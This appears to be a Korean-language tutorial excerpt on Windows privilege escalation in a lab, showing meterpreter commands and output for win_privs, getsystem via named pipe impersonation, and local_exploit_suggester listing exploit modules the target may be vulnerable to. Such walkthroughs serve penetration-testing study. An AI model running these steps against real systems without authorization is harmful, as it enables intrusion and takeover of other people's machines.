win_privs를 통한 권한 확인
post/windows/gather/win_privs
meterpreter > run post/windows/gather/win_privs
Current User
Is Admin Is System Is In Local Admin Group UAC Enabled Foreground ID UID ——– ——— ———————– ———– ————- — False False True False 1 “HAHWUL\Test-Virtualbox”
Windows Privileges
Name —- SeChangeNotifyPrivilege
getsystem을 통해 자동 권한상승
meterpreter > getsystem -h Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:
-h Help Banner.
-t <opt> The technique to use. (Default to '0'). 0 : All techniques available 1 : Named Pipe Impersonation (In Memory/Admin) 2 : Named Pipe Impersonation (Dropper/Admin) 3 : Token Duplication (In Memory/Admin)
meterpreter > getsystem
…got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
local_exploit_suggester를 이용하여 local exploit 찾기
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 192.168.56.101 - Collecting local exploits for x86/windows…
[*] 192.168.56.101 - 37 exploit checks are being tried…
[+] 192.168.56.101 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 192.168.56.101 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.56.101 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 192.168.56.101 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.56.101 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.56.101 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 192.168.56.101 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 192.168.56.101 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 192.168.56.101 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 192.168.56.101 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.